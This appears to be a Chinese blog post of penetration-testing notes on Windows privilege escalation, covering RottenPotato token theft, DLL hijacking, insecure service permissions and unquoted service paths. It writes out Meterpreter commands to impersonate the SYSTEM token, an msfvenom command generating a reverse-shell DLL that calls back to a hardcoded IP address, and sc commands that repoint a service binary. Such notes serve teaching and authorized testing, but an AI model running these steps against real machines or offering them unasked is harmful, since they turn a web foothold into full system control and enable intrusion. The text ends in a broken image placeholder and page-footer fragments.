RottenPotato(烂土豆)提权的原理简述如下:
- 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端
- 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。
- 模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
所以,一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的。测试过程中,我发现使用已经建好的账户(就是上面说的用户和账户)去反弹meterpreter然后再执行EXP的时候会失败,但使用菜刀(IIS服务器权限)反弹meterpreter就会成功。
烂土豆比热土豆的优点是:
- 100%可靠
- (当时)全版本通杀
- 立即生效,不用像hot potato那样有时候需要等Windows更新才能使用
总之,我对这个的理解是通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改为自己的区块获取SYSTEM权限,然后利用msf的模仿令牌功能模仿SYSTEM令牌。
必备知识点:
#令牌窃取配合烂土豆提权 单纯令牌窃取:Web 权限或本地提权 如配合烂土豆提权:Web 或数据库等权限 #不带引号服务路径安全问题 服务路径提权:Web 权限或本地提权
#不安全的服务权限配置问题 服务权限配置:Web 权限或本地提权(Web 几率小)
#补充说明:dll 劫持提权及 AlwaysInstallElevated 等说明 dll 劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋 AlwaysInstallElevated 提权默认禁用配置,利用成功机会很少
#案例1.Win2012-烂土豆配合令牌窃取提权-Web权限
原理:参考上述内容,非服务类用户无法窃取成功
过程:上传烂土豆-执行烂土豆-利用窃取模块-窃取SYSTEM-成功
实现:web权限-通过烂土豆配合令牌-获取SYSTEM
《MSF操作》
upload /root/potato.exe C:\Users\Public
cd C:\\Users\\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
#案例2.Wind2012-DLL劫持提权应用配合MSF-web权限
原理:Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程序要查找的 位置放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径,它会根据下 面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)
过程:信息收集(第三方软件)-进程调试(本地调试)-制作 dll 并上传-替换 dll-启动应用后成功
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.169.46 lport=6677 -f dll >/opt/xiaodi.dll
#案例3.Win2012-不安全的服务权限配合MSF-本地权限
原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有 过多的权限,例如,可以直接修改它导致重定向执行文件。 过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功
accesschk.exe -uwcqv "administrators" * #微软官方工具
accesschk.exe -uwcqv "users" *
sc config "NewServiceName" binpath="C:\Program.exe"
sc start "NewServiceName"
#案例4.Win2012-不带引号服务路径配合MSF-Web,本地权限
原理:当 Windows 服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完 整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系 统将会执行找到的空格分隔的服务路径的第一个实例。
过程:检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
/i /v “”"
[外链图片转存中...(img-9Eha8Un1-1634110127895)]
190
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
